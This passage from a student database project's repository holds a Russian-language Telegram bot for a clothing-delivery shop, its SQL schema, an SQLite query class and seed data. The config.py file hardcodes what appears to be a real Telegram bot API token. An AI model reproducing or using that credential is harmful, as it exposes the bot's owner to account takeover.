reply_markup=markup_menu)\n\n\[email protected]_query_handler(func=lambda call:True)\ndef call_back_order(call):\n if call.data == 'order':\n bot.send_message(call.message.chat.id, 'Введите ID заказа')\n order_summary_info()\n elif call.data == 'client':\n bot.send_message(call.message.chat.id, 'Введите ID клиента')\n get_client_info()\n elif call.data == 'courier':\n bot.send_message(call.message.chat.id, 'Чтобы узнать расписание курьера, введите его ID,'\n 'начало и конец временного промежутка в формате yyyy-mm-dd h:mm\\n'\n 'Пример ввода: 1, 2020-12-15 7:00, 2020-12-30 17:00')\n get_courier_timetable_info()\n elif call.data == 'add product':\n bot.send_message(call.message.chat.id, 'Введите следующие характеристики товара:'\n 'Артикул, бренд, сезон, размер, пол, тип, цвет, материал, цена, '\n 'страна производства, ID поставщика')\n add_product2()\n elif call.data == 'edit order':\n bot.send_message(call.message.chat.id, 'Выберите, что хотите изменить:', reply_markup=markup_menu1)\n elif call.data == 'address':\n bot.send_message(call.message.chat.id, 'Введите ID заказа и новый адрес')\n change_address1()\n elif call.data == 'payment':\n bot.send_message(call.message.chat.id, 'Введите ID заказа и желаемый способ оплаты')\n change_payment1()\n\n\ndef change_payment1():\n @bot.message_handler(content_types=['text'])\n def change_payment2(message):\n s = message.text.split(', ')\n db = SQLiter(config.database_name)\n result = db.change_payment(s[0], s[1])\n if result == 0:\n bot.send_message(message.chat.id, 'Ошибка! 
Заказа с таким ID не найдено.')\n        else:\n            bot.send_message(message.chat.id, 'Метод оплаты успешно изменен.')\n            parc = db.get_parcels(s[0])\n            for c in parc:\n                bot.send_message(message.chat.id, 'ID заказа: ' + str(c[0]) + '\\nID посылки: ' + str(c[1]) +\n                                 '\\nСпособ оплаты: ' + str(c[2]) + '\\n')\n\n\ndef change_address1():\n    @bot.message_handler(content_types=['text'])\n    def change_address2(message):\n        s = message.text.split(', ')\n        db = SQLiter(config.database_name)\n        result = db.change_address(s[0], s[1])\n        if result == 0:\n            bot.send_message(message.chat.id, 'Ошибка! Заказа с таким ID не найдено.')\n        elif result == 1:\n            bot.send_message(message.chat.id, 'Ошибка! Неверный адрес.')\n        else:\n            bot.send_message(message.chat.id, 'Адрес успешно изменен.')\n            addr = db.get_address(s[0])\n            for c in addr:\n                bot.send_message(message.chat.id, 'ID заказа: ' + str(c[0]) + '\\nID посылки: ' + str(c[1]) +\n                                 '\\nАдрес доставки: ' + str(c[2]) + '\\n')\n\n\ndef add_product2():\n    @bot.message_handler(content_types=['text'])\n    def add_product1(message):\n        description = message.text.split(', ')\n        db = SQLiter(config.database_name)\n        result = db.add_product(description)\n        if result == 1:\n            bot.send_message(message.chat.id, 'Товар успешно добавлен в каталог.')\n            catal = db.get_product_info(description[0])\n            bot.send_message(message.chat.id, 'Продукт с артикулом ' + str(catal[0][0]) +\n                             ' присутствует в каталоге и имеет тип ' + str(catal[0][1]))\n        else:\n            bot.send_message(message.chat.id, 'Ошибка! Уже есть товар с таким артикулом.')\n\n\ndef get_courier_timetable_info():\n    @bot.message_handler(content_types=['text'])\n    def courier_timetable(message):\n        s = message.text.split(', ')\n        start = datetime.strptime(s[1], '%Y-%m-%d %H:%M')\n        end = datetime.strptime(s[2], '%Y-%m-%d %H:%M')\n        db = SQLiter(config.database_name)\n        timetable = db.get_courier_timetable(s[0], start, end)\n        if len(timetable) == 0:\n            bot.send_message(message.chat.id, 'Нет поставок в заданный промежуток времени.')\n        else:\n            for c in timetable:\n                info = 'Время доставки с ' + str(c[0]) + ' по ' + str(c[1]) + '\\nID посылки: '\\\n                       + str(c[2]) + '\\nСпособ доставки: ' + str(c[3]) + '\\nАдрес: ' + str(c[4]) + '\\nИмя клиента: ' + str(c[5])\n                bot.send_message(message.chat.id, info)\n\n\ndef get_client_info():\n    @bot.message_handler(content_types=['text'])\n    def client_info(message):\n        db = SQLiter(config.database_name)\n        order = db.get_client_purchases(message.text)\n        if len(order) == 0:\n            bot.send_message(message.chat.id, 'Нет клиента с таким ID.')\n        else:\n            for c in order:\n                info = 'ID заказа: ' + str(c[0]) + '\\nID товара: ' + str(c[1]) + '\\nТип товара: '\\\n                       + str(c[2]) + '\\nЦена: ' + str(c[3]) + ' руб. \\nКоличество: ' + str(c[4])\n                bot.send_message(message.chat.id, info)\n\n\ndef order_summary_info():\n    @bot.message_handler(content_types=['text'])\n    def order_summary(message):\n        db = SQLiter(config.database_name)\n        order = db.get_order_summary(message.text)\n        if len(order) == 0:\n            bot.send_message(message.chat.id, 'Нет заказа с таким ID.')\n        else:\n            for c in order:\n                info = 'ID заказа: ' + str(c[0]) + '\\nСумма заказа: ' + str(c[1]) + ' руб. 
\\nСкидка: '\\\n                       + str(c[2]) + '% \\nИмя клиента: ' + str(c[4]) + '\\nНомер телефона: ' + str(c[5])\n                bot.send_message(message.chat.id, info)\n\nbot.polling()\n" }, { "alpha_fraction": 0.6681849956512451, "alphanum_fraction": 0.684653103351593, "avg_line_length": 24.18644142150879, "blob_id": "d394f5b6643691af56829b324562fb91ba7fb6da", "content_id": "7043a4ce0414604167ac71d0a20f0b733a8983cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2854, "license_type": "no_license", "max_line_length": 82, "num_lines": 118, "path": "/database.ddl", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "CREATE TABLE courier (\n    id_courier INT PRIMARY KEY,\n    courier_name VARCHAR(40),\n    phone_number VARCHAR(20),\n    transport VARCHAR(20)\n);\n\n\nCREATE TABLE pick_up_point (\n    id_pick_up_point INT PRIMARY KEY,\n    address VARCHAR(150),\n    payment_types VARCHAR(50),\n    storage_duration INT,\n    working_time VARCHAR(20)\n);\n\n\nCREATE TABLE client (\n    id_client INT PRIMARY KEY,\n    client_name VARCHAR(40),\n    gender VARCHAR(10),\n    phone_number VARCHAR(20),\n    clothes_size INT\n);\n\n\nCREATE TABLE orders (\n    id_order INT PRIMARY KEY,\n    sum FLOAT,\n    discount INT,\n    id_client INT,\n    FOREIGN KEY (id_client) REFERENCES client(id_client)\n);\n\n\nCREATE TABLE shipper (\n    id_shipper INT PRIMARY KEY,\n    company_name VARCHAR(40)\n);\n\n\nCREATE TABLE storage (\n    id_storage INT PRIMARY KEY,\n    address VARCHAR(150),\n    working_time VARCHAR(20),\n    capacity INT\n);\n\n\nCREATE TABLE product (\n    id_product INT PRIMARY KEY,\n    brand VARCHAR(20),\n    season VARCHAR(20),\n    size INT,\n    gender VARCHAR(10),\n    product_type VARCHAR(20),\n    color VARCHAR(20),\n    material VARCHAR(20),\n    price FLOAT,\n    origin_country VARCHAR(20),\n    id_shipper INT,\n    FOREIGN KEY (id_shipper) REFERENCES shipper(id_shipper)\n);\n\n\nCREATE TABLE parcel (\n    id_parcel INT PRIMARY KEY,\n    payment_type VARCHAR(20),\n    delivery_type VARCHAR(20),\n    delivery_time_start DATETIME,\n    delivery_time_end DATETIME,\n    address VARCHAR(150),\n    id_courier INT,\n    id_storage INT,\n    id_order INT,\n    FOREIGN KEY (id_courier) REFERENCES courier(id_courier),\n    FOREIGN KEY (id_storage) REFERENCES storage(id_storage),\n    FOREIGN KEY (id_order) REFERENCES orders(id_order)\n);\n\n\n\nCREATE TABLE client_pick_up_point (\n    id_client INT,\n    id_pick_up_point INT,\n    FOREIGN KEY (id_client) REFERENCES client(id_client),\n    FOREIGN KEY (id_pick_up_point) REFERENCES pick_up_point(id_pick_up_point),\n    CONSTRAINT PK_client_pick_up_point PRIMARY KEY (id_client, id_pick_up_point)\n);\n\n\nCREATE TABLE courier_pick_up_point (\n    id_courier INT,\n    id_pick_up_point INT,\n    FOREIGN KEY (id_courier) REFERENCES courier(id_courier),\n    FOREIGN KEY (id_pick_up_point) REFERENCES pick_up_point(id_pick_up_point),\n    CONSTRAINT PK_courier_pick_up_point PRIMARY KEY (id_courier, id_pick_up_point)\n);\n\n\nCREATE TABLE product_order (\n    id_product INT,\n    id_order INT,\n    quantity INT,\n    FOREIGN KEY (id_product) REFERENCES product(id_product),\n    FOREIGN KEY (id_order) REFERENCES orders(id_order),\n    CONSTRAINT PK_product_order PRIMARY KEY (id_product, id_order)\n);\n\n\nCREATE TABLE product_storage (\n    id_product INT,\n    id_storage INT,\n    quantity INT,\n    FOREIGN KEY (id_product) REFERENCES product(id_product),\n    FOREIGN KEY (id_storage) REFERENCES storage(id_storage),\n    CONSTRAINT PK_product_storage PRIMARY KEY (id_product, id_storage)\n);\n" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.6382978558540344, "avg_line_length": 23.5, 
"blob_id": "bf69d352a86351c2e1e3db251f8851f940267fc4", "content_id": "3ce558cc2eec465e9134ee26f490874228b6433f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 26, "num_lines": 2, "path": "/config.py", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "API_TOKEN = '1454096853:AAGw-RoippRv7M1kEeWzRkmlASsUm0eToOE'\ndatabase_name = 'shops.db'\n" }, { "alpha_fraction": 0.4716067910194397, "alphanum_fraction": 0.4773785173892975, "avg_line_length": 37.9202880859375, "blob_id": "839a0d26acd0c451784a50c249a99460c5602843", "content_id": "f3df6e29ef01326c9da1edb93de598b2c82dd634", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5382, "license_type": "no_license", "max_line_length": 151, "num_lines": 138, "path": "/data_handler.py", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sqlite3\n\nclass SQLiter:\n def __init__(self, database):\n self.connection = sqlite3.connect(database)\n self.cursor = self.connection.cursor()\n\n def get_order_summary(self, order_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT orders.id_order, orders.sum, orders.discount, client.id_client, client.client_name, client.phone_number\n FROM orders\n JOIN client ON orders.id_client = client.id_client\n WHERE orders.id_order = ?\n ''', (order_id, )).fetchall()\n\n def get_client_purchases(self, client_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT orders.id_order, product.id_product, product.product_type, product.price, product_order.quantity\n FROM orders\n JOIN product_order ON orders.id_order = product_order.id_order\n JOIN product ON product_order.id_product = product.id_product\n WHERE orders.id_client = ?\n ''', (client_id, )).fetchall()\n\n def get_courier_timetable(self, courier_id, delivery_time_start, delivery_time_end):\n with self.connection:\n return self.cursor.execute('''\n SELECT parcel.delivery_time_start, parcel.delivery_time_end, parcel.id_parcel, parcel.delivery_type, parcel.address, client.client_name\n FROM parcel\n JOIN orders ON parcel.id_order = orders.id_order\n JOIN client ON orders.id_client = client.id_client\n WHERE parcel.id_courier = ? 
AND parcel.delivery_time_end > ?\n AND parcel.delivery_time_start < ?\n ORDER BY parcel.delivery_time_start\n ''', (courier_id, delivery_time_start, delivery_time_end)).fetchall()\n\n # d = [product_id, brand, season, size, gender, product_type, color, material, price, origin_country, id_shipper]\n def add_product(self, d):\n with self.connection:\n flag = self.cursor.execute('''\n SELECT id_product\n FROM product\n WHERE id_product = ?\n ''', (d[0],)).fetchall()\n\n if len(flag) != 0:\n return 0\n\n with self.connection:\n self.cursor.execute(''' \n INSERT INTO product VALUES\n (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n ''', (d[0], d[1], d[2], d[3], d[4], d[5], d[6], d[7], d[8], d[9], d[10], )).fetchall()\n return 1\n\n def get_product_info(self, product_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT id_product, product_type\n FROM product\n WHERE product.id_product = ?\n ''', (product_id, )).fetchall()\n\n\n def change_address(self, order_id, address):\n with self.connection:\n flag = self.cursor.execute('''\n SELECT id_order\n FROM orders\n WHERE id_order = ?\n ''', (order_id,)).fetchall()\n\n if len(flag) == 0:\n return 0\n\n with self.connection:\n flag = self.cursor.execute('''\n SELECT id_pick_up_point\n FROM pick_up_point\n WHERE address = ?\n ''', (address,)).fetchall()\n flag1 = self.cursor.execute('''\n SELECT delivery_type\n FROM parcel\n WHERE id_order = ?\n ''', (order_id,)).fetchall()\n\n if (len(flag) == 0) and (flag1[0][0] == 'пункт выдачи'):\n return 1\n\n with self.connection:\n flag = self.cursor.execute('''\n UPDATE parcel SET address = ?\n WHERE id_order = ? \n ''', (address, order_id,)).fetchall()\n\n return 2\n\n def change_payment(self, order_id, payment):\n with self.connection:\n flag = self.cursor.execute('''\n SELECT id_order\n FROM orders\n WHERE id_order = ?\n ''', (order_id,)).fetchall()\n\n if len(flag) == 0:\n return 0\n\n with self.connection:\n self.cursor.execute('''\n UPDATE parcel SET payment_type = ?\n WHERE id_order = ? \n ''', (payment, order_id,)).fetchall()\n\n return 1\n\n def get_parcels(self, order_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT id_order, id_parcel, payment_type\n FROM parcel\n WHERE id_order = ? \n ''', (order_id,)).fetchall()\n\n def get_address(self, order_id):\n with self.connection:\n return self.cursor.execute('''\n SELECT id_order, id_parcel, address\n FROM parcel\n WHERE id_order = ? 
\n            ''', (order_id,)).fetchall()\n\n    def close(self):\n        self.connection.close()\n" }, { "alpha_fraction": 0.34722819924354553, "alphanum_fraction": 0.5771379470825195, "avg_line_length": 38.440677642822266, "blob_id": "9362e4c90a3477db6b93c4ba4532414a5315a5cf", "content_id": "704e0c6d96fa2ee63895fd8553c9b8577d0511c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2859, "license_type": "no_license", "max_line_length": 112, "num_lines": 59, "path": "/create_db.sql", "repo_name": "mykaminskaya/DBMS-project", "src_encoding": "UTF-8", "text": "INSERT INTO 'client' VALUES\n(1, 'Марина', 'женский', '+79859111177', 42),\n(2, 'Арина', 'женский', '+79859111377', 44),\n(3, 'Сергей', 'мужской', '+79859111277', 150);\n\nINSERT INTO 'shipper' VALUES\n(1, 'STONKS'),\n(2, 'FLEX'),\n(3, 'CRINGE'),\n(4, 'CHILL'),\n(5, 'DOG');\n\nINSERT INTO 'product' VALUES\n(0, 'gucci', 'лето', 39, 'женский', 'flip-flops', 'серый', 'кожа', 25000, 'США', 1),\n(1, 'gucci', 'зима', 55, 'мужской', 'куртка', 'красный', 'хлопок', 125000, 'США', 1),\n(2, 'prada', 'демисезон', 7, 'женский', 'перчатки', 'серый', 'кожа', 35000, 'Великобритания', 2),\n(3, 'abc', 'лето', 43, 'мужской', 'джинсы', 'синий', 'деним', 5000, 'Россия', 3),\n(4, 'abc', 'зима', 45, 'женский', 'шарф', 'зеленый', 'шерсть', 3000, 'Россия', 3),\n(5, 'abcd', 'демисезон', 42, 'женский', 'топ', 'мультиколор', 'хлопок', 2300, 'Германия', 4);\n\nINSERT INTO 'orders' VALUES\n(1, 40000, 10, 1),\n(2, 3000, 15, 1),\n(3, 7500, 20, 2),\n(4, 12500, 20, 2),\n(5, 2500, 15, 2),\n(6, 8000, 5, 3),\n(7, 33000, 5, 3);\n\nINSERT INTO 'courier' VALUES\n(1, 'Pavel', '89091234327', 'велосипед');\n\nINSERT INTO 'pick_up_point' VALUES\n(1, 'Маковского 2', 'наличными', '3', '8:00 - 23:00'),\n(2, 'Ленина 12', 'наличными или картой', '5', '7:00 - 23:00');\n\nINSERT INTO 'storage' VALUES\n(1, 'Пушкина 21', '6:00 - 23:30', 1000),\n(2, 'Колотушкина 12', '3:00 - 23:30', 2000);\n\nINSERT INTO 'parcel' VALUES\n(1, 'картой', 'пункт выдачи', '2020-12-15 07:00:00.000', '2020-12-16 07:00:00.000', 'Маковского 2', 1, 1, 1),\n(2, 'картой', 'пункт выдачи', '2020-12-15 07:00:00.000', '2020-12-16 07:00:00.000', 'Маковского 2', 1, 2, 1),\n(3, 'наличными', 'на дом', '2020-12-21 19:30:00.000', '2020-12-21 21:30:00.000', 'Старый Арбат 10', 1, 1, 2),\n(4, 'картой', 'пункт выдачи', '2020-12-20 07:00:00.000', '2020-12-22 07:00:00.000', 'Ленина 12', 1, 1, 3),\n(5, 'картой', 'пункт выдачи', '2020-12-25 07:00:00.000', '2020-12-27 07:00:00.000', 'Ленина 12', 1, 2, 4),\n(6, 'картой', 'на дом', '2020-12-26 15:00:00.000', '2020-12-26 17:30:00.000', 'Покровский бульвар 11', 1, 2, 5),\n(7, 'наличными', 'пункт выдачи', '2020-12-29 10:00:00.000', '2020-12-30 10:00:00.000', 'Маковского 2', 1, 2, 6),\n(8, 'картой', 'пункт выдачи', '2020-12-30 07:00:00.000', '2020-12-31 07:00:00.000', 'Маковского 2', 1, 1, 7);\n\nINSERT INTO 'product_order' VALUES\n(1, 1, 2),\n(5, 1, 4),\n(0, 2, 1),\n(3, 3, 3),\n(4, 4, 1),\n(2, 5, 1),\n(1, 6, 5),\n(2, 7, 10);\n" } ]
7
miccio-dk/sound_morph
https://github.com/miccio-dk/sound_morph
1ddd344180b98d1661b90cd4f7309067ea8d5231
0dfb3a0106a4f71f02613cf28fd75a16b4993e9b
521abc5fe8d8f7ad15a10556b2b2041817b9a41b
refs/heads/main
2023-05-27T12:44:10.659178
2021-06-18T12:38:02
2021-06-18T12:38:02
336,076,322
0
1
null
2021-02-04T20:38:02
2021-02-25T16:35:59
2021-02-26T10:00:36
Jupyter Notebook
[ { "alpha_fraction": 0.5393322110176086, "alphanum_fraction": 0.5495189428329468, "avg_line_length": 30.553571701049805, "blob_id": "d998901bca5388e56f7042c7f879a109cb855499", "content_id": "8b017d43c3aa338b16c0607d4b92dc825c380dc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1767, "license_type": "no_license", "max_line_length": 118, "num_lines": 56, "path": "/datasets/transforms.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import math\nimport torch\nfrom torchaudio.functional import amplitude_to_DB\n\n\nclass Stft(object):\n def __init__(self, n_fft, window=None, return_complex=False, **kwargs):\n self.n_fft = n_fft\n self.window = torch.Tensor(window) if window is not None else None\n self.return_complex = return_complex\n self.kwargs = kwargs\n\n def __call__(self, x):\n x_spec = torch.stft(x, self.n_fft, \n window=self.window.to(x.device), \n return_complex=self.return_complex, \n **self.kwargs)\n x_spec = x_spec.transpose(-1, -3)\n return x_spec\n \n\nclass Istft(object):\n def __init__(self, n_fft, window=None, return_complex=False, **kwargs):\n self.n_fft = n_fft\n self.window = torch.Tensor(window) if window is not None else None\n self.return_complex = return_complex\n self.kwargs = kwargs\n\n def __call__(self, x_spec):\n x_spec = x_spec.transpose(-3, -1)\n x = torch.istft(x_spec, self.n_fft, \n window=self.window.to(x_spec.device), \n return_complex=self.return_complex, \n **self.kwargs)\n return x\n\n \nclass ConvToMag(object):\n def __init__(self):\n pass\n\n def __call__(self, x_spec):\n x_spec = x_spec.transpose(-3, -1).contiguous()\n x_spec = torch.view_as_complex(x_spec)\n x_mag = torch.abs(x_spec)\n return x_mag\n\n \nclass ConvToDb(object):\n def __init__(self):\n pass\n\n def __call__(self, x_spec):\n x_mag = ConvToMag()(x_spec)\n x_db = amplitude_to_DB(x_mag, multiplier=20., amin=1e-5, db_multiplier=math.log10(max(1e-5, 1.)), top_db=120.)\n return x_db\n" }, { "alpha_fraction": 0.5874689817428589, "alphanum_fraction": 0.5887096524238586, "avg_line_length": 32.58333206176758, "blob_id": "3e5eeb7607f955757dbcbcce78da9fe5bb71cd05", "content_id": "e62717e2f114077cff2fd1cf007ce0dddeed9176", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1612, "license_type": "no_license", "max_line_length": 85, "num_lines": 48, "path": "/datasets/urbansounds_dataset.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import os.path as osp\nimport pandas as pd\nimport librosa as lr\nimport torch\n\nfrom torch.utils.data import Dataset\n\n\n# generic sofa dataset\nclass UrbanSoundsDataset(Dataset):\n def __init__(self, dataset_path, transform=None, \n sr=None, duration=2, classes=None):\n self.dataset_path = dataset_path\n self.transform = transform\n self.sr = sr\n self.duration = duration\n self.classes = classes\n self.df = None\n self.load_data()\n\n def __len__(self):\n return self.df.shape[0]\n\n def __getitem__(self, idx: int):\n item = self.df.iloc[idx]\n filepath = osp.join(self.dataset_path, f'{item.name}.wav')\n sample, sr = lr.load(filepath, sr=self.sr, duration=self.duration, mono=True)\n sample = lr.util.fix_length(sample, int(sr * self.duration))\n sample = torch.tensor(sample)\n if self.transform:\n sample = self.transform(sample)\n return sample, item.to_dict()\n\n def load_data(self):\n filepath_cache = osp.join(self.dataset_path, 'train.pkl')\n if osp.exists(filepath_cache):\n #print(f'Loading 
cached data: {filepath_cache}')\n _df = pd.read_pickle(filepath_cache)\n else:\n filepath = osp.join(self.dataset_path, 'train.csv')\n #print(f'Caching data: {filepath}')\n _df = pd.read_csv(filepath, index_col='ID')\n _df.to_pickle(filepath_cache)\n # filter data\n if self.classes:\n _df = _df[_df['Class'].isin(self.classes)]\n self.df = _df\n #print(f'Data: {_df.shape}')\n" }, { "alpha_fraction": 0.5999091863632202, "alphanum_fraction": 0.6008174419403076, "avg_line_length": 36.3220329284668, "blob_id": "4d876fe411606085db2890611db0f58cfa5e52b8", "content_id": "2b00b7a9926b52da2560b9dac5ee0e66c7116dc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 99, "num_lines": 59, "path": "/datasets/nsynth_dataset.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import os.path as osp\nimport pandas as pd\nimport librosa as lr\nimport torch\n\nfrom torch.utils.data import Dataset\n\n\n# generic sofa dataset\nclass NsynthDataset(Dataset):\n def __init__(self, dataset_path, transform=None, \n sr=None, duration=2,\n pitches=None, velocities=None, instrument_sources=None, instrument_families=None):\n self.dataset_path = dataset_path\n self.transform = transform\n self.sr = sr\n self.duration = duration\n self.pitches = pitches\n self.velocities = velocities\n self.instrument_sources = instrument_sources\n self.instrument_families = instrument_families\n self.df = None\n self.load_data()\n\n def __len__(self):\n return self.df.shape[0]\n\n def __getitem__(self, idx: int):\n item = self.df.iloc[idx]\n filepath = osp.join(self.dataset_path, 'audio', f'{item.name}.wav')\n sample, sr = lr.load(filepath, sr=self.sr, duration=self.duration, mono=True)\n sample = lr.util.fix_length(sample, sr * self.duration)\n sample = torch.tensor(sample)\n if self.transform:\n sample = self.transform(sample)\n item = item.drop('qualities_str').to_dict()\n return sample, item\n\n def load_data(self):\n filepath_cache = osp.join(self.dataset_path, 'examples_cache.pkl')\n if osp.exists(filepath_cache):\n #print(f'Loading cached data: {filepath_cache}')\n _df = pd.read_pickle(filepath_cache)\n else:\n filepath = osp.join(self.dataset_path, 'examples.json')\n #print(f'Caching data: {filepath}')\n _df = pd.read_json(filepath).T\n _df.to_pickle(filepath_cache)\n # filter data\n if self.pitches:\n _df = _df[_df['pitch'].isin(self.pitches)]\n if self.velocities:\n _df = _df[_df['velocity'].isin(self.velocities)]\n if self.instrument_sources:\n _df = _df[_df['instrument_source'].isin(self.instrument_sources)]\n if self.instrument_families:\n _df = _df[_df['instrument_family'].isin(self.instrument_families)]\n self.df = _df\n #print(f'Data: {_df.shape}')\n" }, { "alpha_fraction": 0.6487455368041992, "alphanum_fraction": 0.6684587597846985, "avg_line_length": 28.421052932739258, "blob_id": "4d9535141433e40b909f4f1883a287c3446ee5e1", "content_id": "644004608d35eb46a6baeed1f173b650051f3c13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 558, "license_type": "no_license", "max_line_length": 116, "num_lines": 19, "path": "/models/utils.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import math\nimport torch\nfrom torch.optim import Adam\nfrom torch_optimizer import Yogi\nfrom torchaudio.functional import amplitude_to_DB\n\n\ndef pick_optimizer(optim_name):\n return {\n 'adam': Adam,\n 'yogi': Yogi\n 
}.get(optim_name, Adam)\n\ndef spec_to_db(x_spec, top_db=80, amin=1e-5):\n x_spec = x_spec.transpose(-3, -1).contiguous()\n x_spec = torch.view_as_complex(x_spec)\n x_mag = torch.abs(x_spec)\n x_db = amplitude_to_DB(x_mag, multiplier=20., amin=amin, db_multiplier=math.log10(max(amin, 1.)), top_db=top_db)\n return x_db" }, { "alpha_fraction": 0.5994962453842163, "alphanum_fraction": 0.6007556915283203, "avg_line_length": 33.434783935546875, "blob_id": "ecac8163766369b03a9166237d81671f5e88438d", "content_id": "7518e0998df3e9289c90971266d2ad9447088e1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1588, "license_type": "no_license", "max_line_length": 111, "num_lines": 46, "path": "/models/vae_base.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import torch\nfrom pytorch_lightning import LightningModule\n\nfrom .utils import pick_optimizer\n\nclass VaeBase(LightningModule):\n def __init__(self, configs):\n super().__init__()\n self.configs = configs\n self.save_hyperparameters()\n\n def training_step(self, batch, batch_idx):\n losses = self._step(batch, batch_idx)\n for loss_name, loss in losses.items():\n self.log(f'train_{loss_name}', loss)\n return losses['loss']\n\n def validation_step(self, batch, batch_idx):\n losses = self._step(batch, batch_idx)\n for loss_name, loss in losses.items():\n self.log(f'val_{loss_name}', loss)\n\n def test_step(self, batch, batch_idx):\n self._step(batch, batch_idx)\n \n def _step(self, batch, batch_idx):\n x_true, labels = batch\n # run entire model\n x_rec, mean, log_var, z = self._shared_eval(x_true)\n # calculate loss\n losses = self._loss_function(x_true, x_rec, mean, log_var, z)\n return losses\n \n def _reparameterize(self, mean, log_var):\n std = torch.exp(0.5 * log_var)\n eps = torch.randn_like(std)\n return mean + eps * std\n\n def configure_optimizers(self):\n OptimClass = pick_optimizer(self.configs['optim'])\n optimizer = OptimClass(self.parameters(), **self.configs['optim_kwargs'])\n lr_scheduler = {\n 'scheduler': torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, **self.configs['lr_scheduler']),\n 'monitor': 'val_loss'\n }\n return [optimizer], [lr_scheduler]\n " }, { "alpha_fraction": 0.6562067270278931, "alphanum_fraction": 0.6598984599113464, "avg_line_length": 47.155555725097656, "blob_id": "6e726fd889ff78d4324ada332543bc23dd71153a", "content_id": "f65e398b51a3818b761d4f436e775a5a05b43225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2167, "license_type": "no_license", "max_line_length": 130, "num_lines": 45, "path": "/datasets/nsynth_datamodule.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import os.path as osp\n\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import LightningDataModule\nfrom torchvision.transforms import Compose\nfrom .nsynth_dataset import NsynthDataset\nfrom .transforms import Stft\n\n\nclass NsynthDataModule(LightningDataModule):\n def __init__(self, configs, num_workers=4, batch_size=32):\n super().__init__()\n # store params\n self.configs = configs\n self.num_workers = num_workers\n self.batch_size = batch_size\n # setup transforms\n if self.configs['feature'] == 'spec':\n #print(self.configs['feature_params'])\n self.transform = Stft(n_fft=self.configs['n_fft'], **self.configs['feature_params'])\n ## TODO implement more features?\n\n def setup(self, stage=None):\n # train/val\n if stage == 'fit' or stage is 
None:\n dataset_path_train = osp.join(self.configs['dataset_path'], 'nsynth-train')\n self.data_train = NsynthDataset(dataset_path_train, transform=self.transform, **self.configs['ds_kwargs'])\n dataset_path_val = osp.join(self.configs['dataset_path'], 'nsynth-valid')\n self.data_val = NsynthDataset(dataset_path_val, transform=self.transform, **self.configs['ds_kwargs'])\n self.dims = self.data_train[0][0].shape\n # test\n if stage == 'test' or stage is None:\n dataset_path_test = osp.join(self.configs['dataset_path'], 'nsynth-test')\n self.data_test = NsynthDataset(dataset_path_test, transform=self.transform, **self.configs['ds_kwargs'])\n if len(self.data_test) > 0:\n self.dims = getattr(self, 'dims', self.data_test[0][0].shape)\n\n def train_dataloader(self):\n return DataLoader(self.data_train, batch_size=self.batch_size, shuffle=True, drop_last=True, num_workers=self.num_workers)\n\n def val_dataloader(self):\n return DataLoader(self.data_val, batch_size=self.batch_size, shuffle=False, drop_last=True, num_workers=self.num_workers)\n\n def test_dataloader(self):\n return DataLoader(self.data_test, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers)\n" }, { "alpha_fraction": 0.6433486342430115, "alphanum_fraction": 0.6473624110221863, "avg_line_length": 39.55813980102539, "blob_id": "336c9c91d904aaf70c6e689daa34753606a57265", "content_id": "6b901634c194a9cfa82dabc7579b1aa1d71ecdd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1744, "license_type": "no_license", "max_line_length": 131, "num_lines": 43, "path": "/datasets/urbansounds_datamodule.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import os.path as osp\n\nfrom torch.utils.data import DataLoader, random_split\nfrom pytorch_lightning import LightningDataModule\nfrom torchvision.transforms import Compose\nfrom .urbansounds_dataset import UrbanSoundsDataset\nfrom .transforms import Stft\n\n\nclass UrbanSoundsModule(LightningDataModule):\n def __init__(self, configs, num_workers=4, batch_size=32):\n super().__init__()\n # store params\n self.configs = configs\n self.num_workers = num_workers\n self.batch_size = batch_size\n # setup transforms\n if self.configs['feature'] == 'spec':\n #print(self.configs['feature_params'])\n self.transform = Stft(n_fft=self.configs['n_fft'], **self.configs['feature_params'])\n ## TODO implement more features?\n\n def setup(self, stage=None):\n # train/val\n if stage == 'fit' or stage is None:\n self.data_all = UrbanSoundsDataset(self.configs['dataset_path'], transform=self.transform, **self.configs['ds_kwargs'])\n # split data\n train_len = int(len(self.data_all) * 0.8)\n val_len = len(self.data_all) - train_len\n self.data_train, self.data_val = random_split(self.data_all, [train_len, val_len])\n self.dims = self.data_train[0][0].shape\n # test\n if stage == 'test' or stage is None:\n pass\n\n def train_dataloader(self):\n return 